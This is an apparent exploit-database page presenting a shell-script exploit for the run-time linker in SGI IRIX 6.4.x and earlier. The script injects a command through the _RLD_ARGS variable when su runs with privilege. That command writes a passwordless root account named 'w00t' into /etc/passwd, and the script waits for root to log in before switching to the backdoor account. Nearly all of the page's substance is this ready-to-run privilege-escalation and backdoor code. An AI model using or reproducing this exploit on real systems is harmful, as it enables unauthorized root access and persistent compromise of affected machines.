SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

2019.04.29
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/bin/sh # SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit # ======================================================================= # The IRIX run-time linker on all versions prior to 6.5 does not properly # scrub environment variables when executing binaries with privilege or # capabilities. A malicious user can leverage this to create files as the # "root" user and partially control the contents. # # -- HackerFantastic (https://hacker.house) # echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/.x.sh chmod 755 /tmp/.x.sh _RLD_ARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su last -3 root echo "[ waiting 5mins for root to login..." sleep 300 su - w00t


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top